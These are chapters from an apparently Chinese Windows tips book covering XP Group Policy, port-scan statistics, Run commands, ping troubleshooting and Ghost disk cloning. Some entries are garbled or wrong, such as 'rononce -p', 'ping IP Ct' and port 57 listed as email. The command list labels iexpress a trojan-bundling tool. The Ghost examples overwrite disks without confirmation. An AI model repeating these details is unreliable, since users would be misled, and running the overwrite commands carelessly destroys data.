在禁用”开始”菜单命令的时候，在右侧窗口中，提供了删除”开始”菜单中的公用程序组、”我的文档”图标、”文档”菜单、”网上邻居”图标等策略。清理”开始”菜单的时候只要将不需要的菜单项所对应的策略启用即可，比如以删除”我的文档”图标为例，具体操作步骤为：

1）在策略列表窗口中用鼠标双击”从开始菜单中删除我的文档图标”选项。

2）在弹出窗口的”设置”标签中，选择”已启用”单选按钮，然后单击”确定”即可。

第四招：桌面相关选项的禁用

Windows XP的桌面就像你的办公桌一样，有时需要进行整理和清洁。有了组策略编辑器之后，这项工作将变得易如反掌，只要在”本地计算机策略”中展开”用户配置→管理模板→桌面”分支，即可在右侧窗口中显示相应的策略选项。

1）隐藏桌面的系统图标

倘若隐藏桌面上的系统图标，传统的方法是通过采用修改注册表的方式来实现，这势必造成一定的风险性，采用组策略编辑器，即可方便快捷地达到此目的。

若要隐藏桌面上的”网上邻居”和”Internet EXPlorer”图标，只要在右侧窗口中将”隐藏桌面上网上邻居图标”和”隐藏桌面上的Internet EXPlorer图标”两个策略选项启用即可。如果隐藏桌面上的所有图标，只要将”隐藏和禁用桌面上的所有项目”启用即可。当启用了”删除桌面上的我的文档图标”和”删除桌面上的我的电脑图标”两个选项以后，”我的电脑”和”我的文档”图标将从你的电脑桌面上消失了。如果在桌面上你不再喜欢”回收站”这个图标，那么也可以把它给删除，具体方法是将”从桌面删除回收站”策略项启用。

2）禁止对桌面的某些更改

如果你不希望别人随意改变计算机桌面的设置，请在右侧窗口中将”退出时不保存设置”这个策略选项启用。当你启用这个了设置以后，其他用户可以对桌面做某些更改，但有些更改，诸如图标和打开窗口的位置、任务栏的位置及大小在用户注销后都无法保存。

第五招：禁止访问”控制面板”

如果你不希望其他用户访问计算机的控制面板，你只要运行组策略编辑器，并在左侧窗口中展开”本地计算机策略→用户配置→管理模板→控制面板”分支，然后将右侧窗口的”禁止访问控制面板”策略启用即可。

此项设置可以防止控制面板程序文件的启动，其结果是他人将无法启动控制面板或运行任何控制面板项目。另外，这个设置将从”开始”菜单中删除控制面板，同时这个设置还从Windows资源管理器中删除控制面板文件夹。

提示：如果你想从上下文菜单的属性项目中选择一个”控制面板”项目，会出现一个消息，说明该设置防止这个操作。

第六招：设置用户权限

当多人共用一台计算机时，在Windows XP中设置用户权限，可以按照以下步骤进行：

1）运行组策略编辑器程序。

2）在编辑器窗口的左侧窗口中逐级展开”计算机配置→Windows设置→安全设置→本地策略→用户权限指派”分支。

3）双击需要改变的用户权限，单击”添加用户或组”按钮，然后双击想指派给权限的用户账号，最后单击”确定”按钮退出。

第七招：文件夹设置审核

Windows XP可以使用审核跟踪用于访问文件或其他对象的用户账户、登录尝试、系统关闭或重新启动以及类似的事件，而审核文件和NTFS分区下的文件夹可以保证文件和文件夹的安全。为文件和文件夹设置审核的步骤如下：

1）在组策略窗口中，逐级展开右侧窗口中的”计算机配置→Windows设置→安全设置→本地策略”分支，然后在该分支下选择”审核策略”选项。

2）在右侧窗口中用鼠标双击”审核对象访问”选项，在弹出的”本地安全策略设置”窗口中将”本地策略设置”框内的”成功”和”失败”复选框都打上勾选标记（如图2），然后单击”确定”按钮。

3）用鼠标右键单击想要审核的文件或文件夹，选择弹出菜单的”属性”命令，接着在弹出的窗口中选择”安全”标签。

4）单击”高级”按钮，然后选择”审核”标签。

5）根据具体情况选择你的操作：

倘若对一个新组或用户设置审核，可以单击”添加”按钮，并且在”名称”框中键入新用户名，然后单击”确定”按钮打开”审核项目”对话框。

要查看或更改原有的组或用户审核，可以选择用户名，然后单击”查看/编辑”按钮。

要删除原有的组或用户审核，可以选择用户名，然后单击”删除”按钮即可。

6）如有必要的话，在”审核项目”对话框中的”应用到”列表中选取你希望审核的地方。

7）如果想禁止目录树中的文件和子文件夹继承这些审核项目，选择”仅对此容器内的对象和/或容器应用这些审核项”复选框。

注意：必须是管理员组成员或在组策略中被授权有”管理审核和安全日志”权限的用户可以审核文件或文件夹。在Windows XP审核文件、文件夹之前，你必须启用组策略中”审核策略”的”审核对象访问”。否则，当你设置完文件、文件夹审核时会返回一个错误消息，并且文件、文件夹都没有被审核

 

(本章完)

[(第48章 黑客扫描特征及易受攻击的端口)]

黑客攻击前先扫描

　　如今，网络上的黑客攻击已经成了家常便饭，自动攻击和计算机蠕虫病毒正以闪电般的速度在网络上蔓延。 今年7月10日到7月23日，Tel Aviv大学的开放端口就曾经被扫描达96000次，它抵挡了来自99个国家，82000名黑客枪林弹雨般的攻击。就此，ForeScout公司开发了一种叫做ActiveScout的防入侵技术，它有助于查明黑客的企图并防止网络攻击。据它观测，现在具有黑客行为的攻击与扫描具有以下特征：

　　约90%的攻击来自蠕虫

　　由于蠕虫病毒具有自动攻击和快速繁殖的特性，因此，它占网络攻击的大约90%，通常是系统扫描或同步攻击。其中，大部分网络攻击的来源地是美国。根据ActiveScout的数据，这些蠕虫病毒繁殖迅速，扫描和攻击相隔的时间很短，因此无法人为控制。蠕虫病毒也具有反复攻击的特性，它们会寻找同一端口并大规模入侵这些端口。如果人们不对蠕虫病毒采取防范措施，攻击/扫描的成功率将达到30%，即在10次扫描中，有3次能获得结果并可进行攻击。

　　96%的扫描集中在端口

　　端口扫描在网络扫描中大约占了96%，UDP（User Datagram Protocol）服务次之，占3.7%。除了这两种之外，剩余的0.3%是用户名和密码扫描、NetBIOS域登录信息和SNMP管理数据等。Tel Aviv大学已经开始努力防止蠕虫攻击和对NetBIOS弱点的网络攻击，因为这些攻击可能会感染所有的Windows系统。同时，在发送流量之前，要求ISP对所有的NetBIOS流量进行过滤。

　　有调查表明：在过去的半年中，存在危险性的Internet流量数量已经增加了2倍；暗噪声主要是由网络探测引起的，45%到55%的可疑行为都是黑客对计算机的扫描造成的；大多数攻击都是自动的，小型程序攻击通常来自以前中毒的计算机；黑客攻击这些网络的主要原因是寻找他们能用来传播垃圾邮件、为非法文件寻找特别存储空间的计算机，或者占用可用于下一次攻击的机器。

10种端口最易受攻击

　　某组织I-Trap曾经收集了来自24个防火墙12小时工作的数据，这些防火墙分别位于美国俄亥俄州24个企业内网和本地ISP所提供的Internet主干网之间。其间，黑客攻击端口的事件有12000次之多，下表是攻击的详细情况。

No. 端口号 服务 攻击事件数 说 明

1 135和445 windows rpc 分别为42次和457次 表明可能感染了最新的windows病毒或蠕虫病毒

2 57 email 56次 黑客利用fx工具对这个端口进行扫描，寻找微软web服务器弱点

3 1080，3128，

6588，8080 代理服务 分别为64、21、21、163次 表示黑客正在进行扫描

4 25 smtp服务 56次 黑客探测smtp服务器并发送垃圾邮件信号

5 10000＋ 未注册的服务 376次 攻击这些端口通常会返回流量，原因可能是计算机或防火墙配置不当，或者黑客模拟返回流量进行攻击

6 161snmp服务 937次 成功获得snmp可能会使黑客完全控制路由器、防火墙或交换机

7 1433微软sql服务 147次 表明计算机可能已经感染了sql slammer蠕虫病毒

8 53dns 1797次 表明防火墙或lan配置可能有问题

9 67引导程序 23次 表明设备可能配置不当

开始..运行..命令集合

gpedit.msc—–组策略 sndrec32——-录音机

Nslookup——-IP地址侦测器 explorer——-打开资源管理器

logoff———注销命令 tsshutdn——-60秒倒计时关机命令

lusrmgr.msc—-本机用户和组 services.msc—本地服务设置

oobe/msoobe /a—-检查XP是否激活 notepad——–打开记事本

cleanmgr——-垃圾整理 net start messenger—-开始信使服务

compmgmt.msc—计算机管理 net stop messenger—–停止信使服务

conf———–启动netmeeting dvdplay——–DVD播放器

charmap——–启动字符映射表 diskmgmt.msc—磁盘管理实用程序

calc———–启动计算器 dfrg.msc——-磁盘碎片整理程序

chkdsk.exe—–Chkdsk磁盘检查 devmgmt.msc— 设备管理器

regsvr32 /u *.dll—-停止dll文件运行 drwtsn32—— 系统医生

rononce -p —-15秒关机 dxdiag———检查DirectX信息

regedt32——-注册表编辑器 Msconfig.exe—系统配置实用程序

rsop.msc——-组策略结果集 mem.exe——–显示内存使用情况

regedit.exe—-注册表 winchat——–XP自带局域网聊天

progman——–程序管理器 winmsd———系统信息

perfmon.msc—-计算机性能监测程序 winver———检查Windows版本

sfc /scannow—–扫描错误并复原

taskmgr—–任务管理器（2000／xp／2003）

转自草盟网络

开始-运行 系列命令

这些东西平时不好找,看到了,就不要错过…

winver———检查Windows版本

wmimgmt.msc—-打开windows管理体系结构（WMI）

wupdmgr——–windows更新程序

wscript——–windows脚本宿主设置

write———-写字板

winmsd———系统信息

wiaacmgr——-扫描仪和照相机向导

winchat——–XP自带局域网聊天

mem.exe——–显示内存使用情况

Msconfig.exe—系统配置实用程序

mplayer2——-简易widnows media player

mspaint——–画图板

mstsc———-远程桌面连接

mplayer2——-媒体播放机

magnify——–放大镜实用程序

mmc————打开控制台

mobsync——–同步命令

dxdiag———检查DirectX信息

drwtsn32—— 系统医生

devmgmt.msc— 设备管理器

dfrg.msc——-磁盘碎片整理程序

diskmgmt.msc—磁盘管理实用程序

dcomcnfg——-打开系统组件服务

ddeshare——-打开DDE共享设置

dvdplay——–DVD播放器

net stop messenger—–停止信使服务

net start messenger—-开始信使服务

notepad——–打开记事本

nslookup——-网络管理的工具向导

ntbackup——-系统备份和还原

narrator——-屏幕”讲述人”

ntmsmgr.msc—-移动存储管理器

ntmsoprq.msc—移动存储管理员操作请求

netstat -an—-（TC）命令检查接口

syncapp——–创建一个公文包

sysedit——–系统配置编辑器

sigverif——-文件签名验证程序

sndrec32——-录音机

shrpubw——–创建共享文件夹

secpol.msc—–本地安全策略

syskey———系统加密，一旦加密就不能解开，保护windows xp系统的双重密码

services.msc—本地服务设置

Sndvol32——-音量控制程序

sfc.exe——–系统文件检查器

sfc /scannow—windows文件保护

tsshutdn——-60秒倒计时关机命令

tourstart——xp简介（安装完成后出现的漫游xp程序）

taskmgr——–任务管理器

eventvwr——-事件查看器

eudcedit——-造字程序

explorer——-打开资源管理器

packager——-对象包装程序

perfmon.msc—-计算机性能监测程序

progman——–程序管理器

regedit.exe—-注册表

rsop.msc——-组策略结果集

regedt32——-注册表编辑器

rononce -p —-15秒关机

regsvr32 /u *.dll—-停止dll文件运行

regsvr32 /u zipfldr.dll——取消ZIP支持

cmd.exe——–CMD命令提示符

chkdsk.exe—–Chkdsk磁盘检查

certmgr.msc—-证书管理实用程序

calc———–启动计算器

charmap——–启动字符映射表

cliconfg——-SQL SERVER 客户端网络实用程序

Clipbrd——–剪贴板查看器

conf———–启动netmeeting

compmgmt.msc—计算机管理

cleanmgr——-垃圾整理

ciadv.msc——索引服务程序

osk————打开屏幕键盘

odbcad32——-ODBC数据源管理器

oobe/msoobe /a—-检查XP是否激活

lusrmgr.msc—-本机用户和组

logoff———注销命令

iexpress——-木马捆绑工具，系统自带

Nslookup——-IP地址侦测器

fsmgmt.msc—–共享文件夹管理器

utilman——–辅助工具管理器

gpedit.msc—–组策略

 

(本章完)

[(第49章 PING命令及使用技巧)]

Ping是个使用频率极高的实用程序，用于确定本地主机是否能与另一台主机交换（发送与接收）数据报。根据返回的信息，我们就可以推断TCP/IP参数是否设置得正确以及运行是否正常。需要注意的是：成功地与另一台主机进行一次或两次数 据报交换并不表示TCP/IP配置就是正确的，我们必须执行大量的本地主机与远程主机的数据报交换，才能确信TCP/IP的正确性。

　　简单的说，Ping就是一个测试程序，如果Ping运行正确，我们大体上就可以排除网络访问层、网卡、MODEM的输入输出线路、电缆和路由器等存在的故障，从而减小了问题的范围。但由于可以自定义所发数据报的大小及无休止的高速发送，Ping也被某些别有用心的人作为DDOS（拒绝服务攻击）的工具，例如许多大型的网站就是被黑客利用数百台可以高速接入互联网的电脑连续发送大量Ping数据报而瘫痪的。

　　按照缺省设置，Windows上运行的Ping命令发送4个ICMP（网间控制报文协议）回送请求，每个32字节数据，如果一切正常，我们应能得到4个回送应答。 Ping能够以毫秒为单位显示发送回送请求到返回回送应答之间的时间量。如果应答时间短，表示数据报不必通过太多的路由器或网络连接速度比较快。Ping还能显示TTL（Time To Live存在时间）值，我们可以通过TTL值推算一下数据包已经通过了多少个路由器：源地点TTL起始值（就是比返回TTL略大的一个2的乘方数）-返回时TTL值。例如，返回TTL值为119，那么可以推算数据报离开源地址的TTL起始值为128，而源地点到目标地点要通过9个路由器网段（128-119）；如果返回TTL值为246，TTL起始值就是256，源地点到目标地点要通过9个路由器网段。

　　1、通过Ping检测网络故障的典型次序

　　正常情况下，当我们使用Ping命令来查找问题所在或检验网络运行情况时，我们需要使用许多Ping命令，如果所有都运行正确，我们就可以相信基本的连通性和配置参数没有问题；如果某些Ping命令出现运行故障，它也可以指明到何处去查找问题。下面就给出一个典型的检测次序及对应的可能故障：

　　·ping 127.0.0.1

　　这个Ping命令被送到本地计算机的IP软件，该命令永不退出该计算机。如果没有做到这一点，就表示TCP/IP的安装或运行存在某些最基本的问题。

　　·ping 本机IP

　　这个命令被送到我们计算机所配置的IP地址，我们的计算机始终都应该对该Ping命令作出应答，如果没有，则表示本地配置或安装存在问题。出现此问题时，局域网用户请断开网络电缆，然后重新发送该命令。如果网线断开后本命令正确，则表示另一台计算机可能配置了相同的IP地址。

　　·ping 局域网内其他IP

　　这个命令应该离开我们的计算机，经过网卡及网络电缆到达其他计算机，再返回。收到回送应答表明本地网络中的网卡和载体运行正确。但如果收到0个回送应答，那么表示子网掩码（进行子网分割时，将IP地址的网络部分与主机部分分开的代码）不正确或网卡配置错误或电缆系统有问题。

　　·ping 网关IP

　　这个命令如果应答正确，表示局域网中的网关路由器正在运行并能够作出应答。

　　·ping 远程IP

　　如果收到4个应答，表示成功的使用了缺省网关。对于拨号上网用户则表示能够成功的访问Internet（但不排除ISP的DNS会有问题）。

　　·ping localhost

　　localhost是个作系统的网络保留名，它是127.0.0.1的别名，每太计算机都应该能够将该名字转换成该地址。如果没有做到这一带内，则表示主机文件（/Windows/host）中存在问题。

　　·ping www.xxx.com（如www.yesky.com 天极网）

　　对这个域名执行Ping www.xxx.com 地址，通常是通过DNS 服务器 如果这里出现故障，则表示DNS服务器的IP地址配置不正确或DNS服务器有故障（对于拨号上网用户，某些ISP已经不需要设置DNS服务器了）。顺便说一句：我们也可以利用该命令实现域名对IP地址的转换功能。

　　如果上面所列出的所有Ping命令都能正常运行，那么我们对自己的计算机进行本地和远程通信的功能基本上就可以放心了。但是，这些命令的成功并不表示我们所有的网络配置都没有问题，例如，某些子网掩码错误就可能无法用这些方法检测到。

　　2、Ping命令的常用参数选项

　　·ping IP Ct

　　连续对IP地址执行Ping命令，直到被用户以Ctrl+C中断。

　　·ping IP -l 3000

　　指定Ping命令中的数据长度为3000字节，而不是缺省的32字节。

　　·ping IP Cn

　　执行特定次数的Ping命令。

 

(本章完)

[(第50章 GHOST详细解说（1）)]

一、分区备份

　　使用ghost进行系统备份，有整个硬盘（Disk）和分区硬盘（Partition）两种方式。在菜单中点击 Local（本地）项，在右面弹出的菜单中有3个子项，其中 Disk表示备份整个硬盘（即克隆）、Partition 表示备份硬盘的单个分区、Check 表示检查硬盘或备份的文件，查看是否可能因分区、硬盘被破坏等造成备份或还原失败。分区备份作为个人用户来保存系统数据，特别是在恢复和复制系统分区时具有实用价值。

　　选 Local→Partition→To Image 菜单，弹出硬盘选择窗口，开始分区备份操作。点击该窗口中白色的硬盘信息条，选择硬盘，进入窗口，选择要操作的分区（若没有鼠标，可用键盘进行操作：TAB键进行切换，回车键进行确认，方向键进行选择）。 在弹出的窗口中选择备份储存的目录路径并输入备份文件名称，注意备份文件的名称带有 GHO 的后缀名。 接下来，程序会询问是否压缩备份数据，并给出3个选择：No 表示不压缩，Fast表示压缩比例小而执行备份速度较快，High 就是压缩比例高但执行备份速度相当慢。最后选择 Yes 按钮即开始进行分区硬盘的备份。ghost 备份的速度相当快，不用久等就可以完成，备份的文件以 GHO 后缀名储存在设定的目录中。

二、硬盘克隆与备份

　　硬盘的克隆就是对整个硬盘的备份和还原。选择菜单Local→Disk→To Disk，在弹出的窗口中选择源硬盘（第一个硬盘），然后选择要复制到的目标硬盘（第二个硬盘）。注意，可以设置目标硬盘各个分区的大小，ghost 可以自动对目标硬盘按设定的分区数值进行分区和格式化。选择 Yes 开始执行。

　　ghost 能将目标硬盘复制得与源硬盘几乎完全一样，并实现分区、格式化、复制系统和文件一步完成。只是要注意目标硬盘不能太小，必须能将源硬盘的数据内容装下。

　　ghost 还提供了一项硬盘备份功能，就是将整个硬盘的数据备份成一个文件保存在硬盘上（菜单 Local→Disk→To Image），然后就可以随时还原到其他硬盘或源硬盘上，这对安装多个系统很方便。使用方法与分区备份相似。

三、备份还原

　　如果硬盘中备份的分区数据受到损坏，用一般数据修复方法不能修复，以及系统被破坏后不能启动，都可以用备份的数据进行完全的复原而无须重新安装程序或系统。当然，也可以将备份还原到另一个硬盘上。

　　要恢复备份的分区，就在界面中选择菜单Local→Partition→From Image，在弹出窗口中选择还原的备份文件，再选择还原的硬盘和分区，点击 Yes 按钮即可。

四、局域网操作

LPT 是通过并口传送备份文件,下面有两个选项：slave 和 master, 分别用以连接主机和客户机。 网络基本输入输出系统 NetBios 和 LPT 相似, 也有 slave 和 master 两个选项, 作用与 LPT 相同。

先和平时一样将要 ghost 的分区做成一个 *.gho 文件，再在一台 win98 上安装Symantec ghost 企业版，重启。

1. 首先制作一张 ghost 带网卡驱动的启动盘。Start > Programs > Symantec ghost > ghost Boot Wizard－>Network Boot Disk 如果你的网卡在列表内直接选择它就可以生成一张带 PC-DOS 的启动盘。（但 6.5版的生成的软盘经常有问题，不能成功启动）如果你的网卡不在列表内，你要建立专用的 Packet Driver。ADD->Packet Driver （网卡的驱动程序中有）往下根据提示一步一步走，填入工作站的 ip（ghost 一定要 tcp/ip 协议）。最后生成一张软盘，但此软盘仍不能使用，要改 autoexec.bat 文件在 net xxxx.dos 后面加一个16进制的地址，如 0X75 等。多台计算机只需改 wattcp.cfg 文件中的 ip 即可:

IP = 192.168.100.44

NETMASK = 255.255.255.0

GATEWAY = 192.168.100.1

2. 在 server 端运行 multicast server 出来的画面。先给 server一个Session Name（别名）如：bb，再选择 image file 就是你的 gho 文件。然后 －>Dump From Client->rtitions->More Options-> 在 auto start 的 client 中填入 50（如果你要同时复制50台）->accept client 就算完成了，当你的工作站数达到50台时，server就自动传送*.gho 文件。

3.详述：

目前，相当多的电子教室都采用了没有软驱、光驱的工作站。在没有软驱、光驱的情况下，当硬盘的软件系统出现问题时，能否实现网络硬盘克隆呢？PXE（Preboot Execution Environment，它是基于 TCP/IP、DHCP、TFTP 等 Internet 协议之上的扩展网络协议）技术提供的从网络启动的功能，让我们找到了解决之道。下面，我们就来讲解怎样采用ghost 7.0来实现基于 PXE 的网络硬盘克隆。

　　网络硬盘克隆过程简述

　　网络硬盘克隆过程为：在装有软驱的工作站上，用一张引导盘来启动机器，连接到服务器，使用 ghost 多播服务（Multicast Server）将硬盘或分区的映像克隆到工作站，这样就实现了不拆机、安全、快速的网络硬盘克隆。

　　实现 PXE 网络启动方式

　　对于没有软驱、光驱的工作站，要实现PXE网络启动方式，需要完成三个步骤：

　　1、工作站的PXE启动设置

　　PXE网络启动一般要求在网卡上加装 PXE 启动芯片（PXE Boot ROM）；对于某些型号的网卡，也可以将 PXE 启动代码（Boot Code）写入主板的 Flash ROM；而一些主板上集成了网卡的品牌机（例如清华同方的商用机），可直接支持PXE启动。

　　常用的 RTL8139 芯片的网卡，其 PXE 启动设置方式是：机器启动时根据屏幕提示按下Shift+F10，在启动类型中选择PXE，开启网络启动选项即可。

 

(本章完)

[(第51章 GHOST详细解说（2）)]

2、制作 PXE 启动文件

　　制作 PXE 的启动文件，推荐使用 3Com 的 DABS（Dynamic Access Boot Services）。DABS 提供了功能强大的 PXE 启动服务、管理功能，但是，网上可供下载的是一个30天的试用版。所以，我们只用它的启动映像文件制作功能，而由 Windows 2000 Server 的 DHCP 服务器来提供 PXE 启动服务。

　　DABS 可以安装在任何一台运行 Windows 的机器上。安装后，运行 3Com Boot Image Editor，出现主界面图。选择”创建TCP/IP或PXE映像文件（Create a TCP/IP or PXE image file）”，出现对话窗口。为即将建立的映像文件命名，例如：pxeghost.img，其他采用默认选项，将经测试正常的网络启动盘放入软驱，选择[OK]，创建PXE启动映像 Pxeghost.img文件。

　　在 3Com Boot Image Editor 的主菜单中，选择”创建PXE菜单启动文件（Creat a PXE menu boot file）”，在出现的窗口中选择[添加（Add）]，加入我们刚刚创建的启动映像文件Pxeghost.img，在”选项（Options）”标签中可以设置菜单标题和等待时间。

　　选择[保存（Save）]，给保存的PXE菜单启动文件命名为 Pxemenu.pxe。

　　3、服务器的PXE启动服务设置

　　Windows 2000 Server 的 DHCP 服务支持两种启动协议：DHCP 和 BOOTP。我们可以设定以下三种选择：仅 DHCP、仅 BOOTP、两者。如果我们的局域网中由其他的 DHCP 服务器提供动态 IP 地址分配，那么这里选”仅BOOTP”即可；如果需要这台服务器提供动态 IP 地址分配，则需要选”两者”。

　　接下来，设置启动文件名。在DHCP服务器的作用域选项中配置选项”067:启动文件名”，字串值为我们创建的 PXE 菜单启动文件名 Pxemenu.pxe。注意：文件名不包含路径。

　　DHCP 服务器只是将启动文件名通知给 BOOTP 客户机，客户机通过什么方式下载启动文件呢？答案是，需要 TFTP 服务。3Com 的 DABS 包含了一个 TFTP 服务组件，当然，也可以下载一个免费的 TFTP 服务器软件长期使用。

　　在 TFTP 服务器的设置中，规定一个服务目录。将制作的 PXE 启动文件 Pxeghost.img、Pxemenu.pxe 放到 TFTP 的服务目录中。TFTP 服务器设置为自动运行。

　　用 ghost 多播克隆硬盘

　　现在运行 ghost 多播服务器，任务名称为 Restore。设置完毕，按下[接受客户（Accept Clients）]按钮。启动要接受硬盘克隆的无软驱工作站，如果以上步骤操作无误，应该能够实现 PXE 启动，加入到多播克隆的任务当中。所有的目标工作站连接到本次任务之后，按下[发送（Send）]按钮，开始克隆任务。

五、参数设置

在 Options 中可以设置参数。下面简单介绍一下:

1．image write buffering：在建立备份文件时, 打开写缓冲；

2．sure：选择此项后, 不再会出现最终确认询问 （建议不要选择此项）；

3．no int 13：选择此项后, 不支持中断 13 （缺省时不选择）；

4．reboot：在对硬盘或者分区操作完成之后, 自动重启计算机；

5．spanning：通过多个卷架构备份文件 （选择此项时, 关闭 write buffering）；

6．autoname：自动为 spanning 文件命名；

7．allow 64k fat clusters：允许使用 64K FAT 簇 （仅在 Windows NT 中支持）；

8．ignore CRC errors：忽略 CRC 错误；

9．override size limit：如果出现分区大小不相配, 可忽略执行；

10．image read buffering：打开生成备份文件时的读缓存 （缺省时选中此项）。

六、软件特性

1.存贮介质

　　ghost 支持的存储介质超出了我们的想象，它支持对等 LPT 接口、对等 USB 接口、对等 TCP/IP 接口、SCSI磁带机、便携式设备（JAZ、ZIP、MO等）、光盘刻录机（CDR、CDRW）等。而这些特性不需要任何外带的驱动程序和软件，只需一张软盘就可以做到！特别是对光盘刻录机的支持，如今的刻录机和空白光盘都十分便宜，非常适合作备份的用途。

 

(本章完)

[(第52章 GHOST详细解说（3）)]

2.兼容性

　　ghost 对现有的操作系统都有良好的支持，包括 FAT16、FAT32、NTFS、HPFS、UNIX、NOVELL 等文件存储格式。同以前版本不同的是，ghost 2001 加入了对 Linux EX2的支持（FIFO 文件存储格式），这也就意味着 Linux 的用户也可以用 ghost 来备份系统了。

3.配套软件

　　A.ghost 浏览器

在以前的 ghost版本中，我们只能对整个系统进行简单的备份、复制、还原，要恢复单个的文件和文件夹还要使用外带的 GhostEXP 软件。现在，Symantec 公司已经将 ghost 浏览器整合在软件中。ghost 浏览器采用类似于资源管理器的界面，通过它，我们可以方便迅速地在备份包中找出我们想要的文件和文件夹并还原。

使用Explorer可以备份整个硬盘或单个硬盘分区，点击工具栏上的圆柱形图标，弹出硬盘或分区选择对话窗口，然后再选择备份文件的储存目录并输入名称即可完成。要注意的是，非注册用户不能使用备份这项功能。

在 ghost Explorer 中管理硬盘备份文件就非常方便了。首先选择打开一个备份文件（File/Open），这时备份中的文件就像资源管理器一样在程序界面窗口中列出，可以在其中非常方便地查看、打开文件，也可以查找文件，或者将某个文件删除（但不能删除目录）。

在 ghost Explorer 中提供了多种还原硬盘备份文件的方法，最方便的方法是使用鼠标右键点击某个文件，在弹出菜单中选择 Restore，然后输入要还原到的目录，这样，单个文件就从整个磁盘备份中还原出来了。当然，如果要还原整个磁盘备份，只需选择左面目录列表栏中最上面的带磁盘图标的目录项，然后点击工具栏中的还原图标 （第二个） 就可以了。

B.GDisk

GDisk 是一个新加入的实用工具，它彻底取代了 FDisk 和 format，功能有：

* 快速格式化。

* ######和显示分区。此功能允许一个以上的主 DOS分区，并且每个分区上的操作系统有不同的版本。######分区的能力使计算机习惯于引导到选定的可引导分区，忽略其他######分区中相同操作系统的安装。

* 全面的分区报告。

* 高度安全的磁盘擦除。提供符合美国国防部标准和更高安全标准的磁盘擦除选项。

与使用交互式菜单的 FDisk 不同，GDisk是由命令行驱动的。这提供了更快的配置磁盘分区和在批处理文件中定义 GDisk操作的能力。但与此同时，几十个参数会令普通用户头疼，因此笔者不推荐一般用户使用，Symantec 公司也应该推出相应的GUI（图形用户界面）控制台以方便用户使用。具体的参数说明可以用命令行 gdisk/? 了解。

C.Live Update

Live Update 是 Symantec公司软件的一个通用升级程序，它能够检查当前系统中已安装的 Symantec 软件，并且通过英特网对软件进行在线升级。

在安装 ghost 2001 时，安装程序自动升级了 Live Update 程序的版本。

七、命令行参数：（ghost 的无人 备份/恢复/复制 操作）

　　其实 ghost 2001 的功能远远不止它主程序中显示的那些，ghost 可以在其启动的命令行中添加众多参数以实现更多的功能。命令行参数在使用时颇为复杂，不过我们可以制作批处理文件，从而”一劳永逸”（类似于无人安装 Windows 98 和Windows 2000）。现在让我们来了解一些常用的参数（了解更加详细的参数介绍可查看 ghost 的帮助文件）。

1.-rb

本次 ghost 操作结束退出时自动重启。这样，在复制系统时就可以放心离开了。

2.-fx

本次 ghost 操作结束退出时自动回到DOS提示符。

3.-sure

对所有要求确认的提示或警告一律回答”Yes”。此参数有一定危险性，只建议高级用户使用。

4.-fro

如果源分区发现坏簇，则略过提示而强制拷贝。此参数可用于试着挽救硬盘坏道中的数据。

5.@filename

在 filename 中指定 txt 文件。txt文件中为 ghost 的附加参数，这样做可以不受DOS命令行 150 个字符的限制。

6.-f32

将源 FAT16 分区拷贝后转换成 FAT32（前提是目标分区不小于 2G）。WinNT 4 和Windows95、97用户慎用。

7.-bootcd

当直接向光盘中备份文件时，此选项可以使光盘变成可引导。此过程需要放入启动盘。

8.-fatlimit

将 NT 的 FAT16 分区限制在 2G。此参数在复制 Windows NT 分区，且不想使用64k/簇的 FAT16 时非常有用。

9.-span

分卷参数。当空间不足时提示复制到另一个分区的另一个备份包。

10.-auto

分卷拷贝时不提示就自动赋予一个文件名继续执行。

11.-crcignore

忽略备份包中的 CRC ERROR。除非需要抢救备份包中的数据，否则不要使用此参数，以防数据错误。

12.-ia

全部映像。ghost 会对硬盘上所有的分区逐个进行备份。

13.-ial

全部映像，类似于 -ia 参数，对 Linux 分区逐个进行备份。

14.-id

全部映像。类似于 -ia 参数，但包含分区的引导信息。

15.-quiet

操作过程中禁止状态更新和用户干预。

16.-script

可以执行多个 ghost 命令行。命令行存放在指定的文件中。

17.-split=x

　　将备份包划分成多个分卷，每个分卷的大小为 x兆。这个功能非常实用，用于大型备份包复制到移动式存储设备上，例如将一个 1.9G 的备份包复制到 3 张刻录盘上。

18.-z

　　将磁盘或分区上的内容保存到映像文件时进行压缩。-z 或 -z1 为低压缩率（快速）；-z2 为高压缩率（中速）；-z3 至 -z9 压缩率依次增大（速度依次减慢）。

19.-clone

　　这是实现 ghost 无人备份/恢复的核心参数。使用语法为：

-clone,MODE=（operation）,SRC=（source）,DST=（destination）,[SZE（size）,SZE（size）…]

此参数行较为复杂，且各参数之间不能含有空格。其中 operation意为操作类型，值可取：copy：磁盘到磁盘；load：文件到磁盘；dump：磁盘到文件；pcopy：分区到分区；pload：文件到分区；pdump：分区到文件。

　　Source 意为操作源，值可取：驱动器号，从1开始；或者为文件名，需要写绝对路径。

Destination 意为目标位置，值可取：驱动器号，从 1开始；或者为文件名，需要写绝对路径；@CDx，刻录机，x 表示刻录机的驱动器号，从1开始。

下面举例说明：

1.命令行参数：ghostpe.exe -clone,mode=copy,src=1,dst=2

完成操作：将本地磁盘1复制到本地磁盘2。

2.命令行参数：ghostpe.exe -clone,mode=pcopy,src=1:2,dst=2:1

完成操作：将本地磁盘1上的第二分区复制到本地磁盘2的第一分区。

3.命令行参数：ghostpe.exe-clone,mode=load,src=g:\3prtdisk.gho,dst=1,sze1=450M,sze2=1599M,sze3=2047M

完成操作：从映像文件装载磁盘1，并将第一个分区的大小调整为450MB，第二个调整为1599MB，第三个调整为2047MB。

4.命令行参数：ghostpe.exe -clone,mode=pdump,src2:1:4:6,dst=d:\prt246.gho

完成操作：创建仅含有选定分区的映像文件。从磁盘2上选择分区1、4、6。

八、一些示例

ghost.exe -clone,mode=copy,src=1,dst=2 -sure

硬盘对拷

ghost.exe -clone,mode=pcopy,src=1:2,dst=2:1 -sure

将一号硬盘的第二个分区复制到二号硬盘的第一个分区

ghost.exe -clone,mode=pdump,src=1:2,dst=g:\bac.gho

将一号硬盘的第二个分区做成映像文件放到 g 分区中

ghost.exe -clone,mode=pload,src=g:\bac.gho:2,dst=1:2

从内部存有两个分区的映像文件中，把第二个分区还原到硬盘的第二个分区

ghost.exe -clone,mode=pload,src=g:\bac.gho,dst=1:1 -fx -sure -rb

用 g 盘的 bac.gho 文件还原 c 盘。完成后不显示任何信息，直接启动

ghost.exe -clone,mode=load,src=g:\bac.gho,dst=2,SZE1=60P,SZE2=40P

将映像文件还原到第二个硬盘，并将分区大小比例修改成 60:40

自动还原磁盘：

